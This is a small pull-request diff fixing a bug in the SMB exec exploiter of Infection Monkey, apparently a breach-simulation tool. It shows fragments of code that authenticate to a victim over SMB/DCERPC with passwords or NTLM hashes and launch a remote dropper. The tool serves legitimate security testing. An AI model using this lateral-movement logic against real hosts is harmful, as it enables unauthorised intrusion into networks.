Merge pull request #895 from guardicore/smb_exec_bugfix

SMB bugfix

monkey/infection_monkey/exploit/smbexec.py

@@ -1,7 +1,6 @@
 from logging import getLogger
 
 from impacket.dcerpc.v5 import scmr, transport
-from impacket.smbconnection import SMB_DIALECT
 
 from common.utils.attack_utils import ScanStatus, UsageEnum
 from common.utils.exploit_enum import ExploitType
@@ -104,7 +103,7 @@ class SmbExploiter(HostExploiter):
             LOG.debug("Exploiter SmbExec is giving up...")
             return False
 
-        self.set_vulnerable_port(self.host)
+        self.set_vulnerable_port()
         # execute the remote dropper in case the path isn't final
         if remote_full_path.lower() != self._config.dropper_target_path_win_32.lower():
             cmdline = DROPPER_CMDLINE_DETACHED_WINDOWS % {'dropper_path': remote_full_path} + \
@@ -121,8 +120,7 @@ class SmbExploiter(HostExploiter):
         for str_bind_format, port in SmbExploiter.KNOWN_PROTOCOLS.values():
             rpctransport = transport.DCERPCTransportFactory(str_bind_format % (self.host.ip_addr,))
             rpctransport.set_dport(port)
-            if hasattr(rpctransport, 'preferred_dialect'):
-                rpctransport.preferred_dialect(SMB_DIALECT)
+            rpctransport.setRemoteHost(self.host.ip_addr)
             if hasattr(rpctransport, 'set_credentials'):
                 # This method exists only for selected protocol sequences.
                 rpctransport.set_credentials(user, password, '', lm_hash, ntlm_hash, None)
@@ -168,7 +166,7 @@ class SmbExploiter(HostExploiter):
                                          SmbExploiter.KNOWN_PROTOCOLS['445/SMB'][1]))
         return True
 
-    def set_vulnerable_port(self, host: VictimHost):
+    def set_vulnerable_port(self):
         if 'tcp-445' in self.host.services:
             self.vulnerable_port = "445"
         elif 'tcp-139' in self.host.services: